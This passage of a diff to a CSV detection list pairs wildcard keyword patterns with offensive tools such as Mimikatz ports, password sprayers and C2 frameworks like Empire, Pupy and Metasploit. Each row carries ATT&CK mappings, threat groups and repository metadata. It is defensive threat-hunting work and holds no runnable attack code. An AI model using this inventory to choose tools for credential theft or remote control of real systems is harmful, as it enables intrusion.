BaseSprayModule*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*import BaseSprayModule*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*import DCSYNC*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and 
Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*import DNSListener*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*import EnablePersistence*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*import eternalhush.*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" -"*import IBurpExtender*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" -"*import impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*import IBurpExtender*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*import impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*import ImpactDecoder*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*import ImpactPacket*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*import LdapSearchBofParser*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*import metame","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" -"*import mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 
- T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*import np_server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*import mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*import np_server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*import Payload*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*import pe.OBJExecutable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "*Import powerview*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*import PupyConfig*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*import PupyConfig*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*import pypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*import 
ShadowForgeHome*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*import Stager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*import udmp_parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" -"*import wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*import wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*import/nessus/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*import/nexpose*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*import_msf_web*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ImportDll::GetAsyncKeyState*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Import-DllImports -PEInfo *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*Import-DllImports*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Import-DllInRemoteProcess*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Import-DllInRemoteProcess*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*import wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*import wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*import/nessus/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*import/nexpose*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*import_msf_web*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ImportDll::GetAsyncKeyState*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 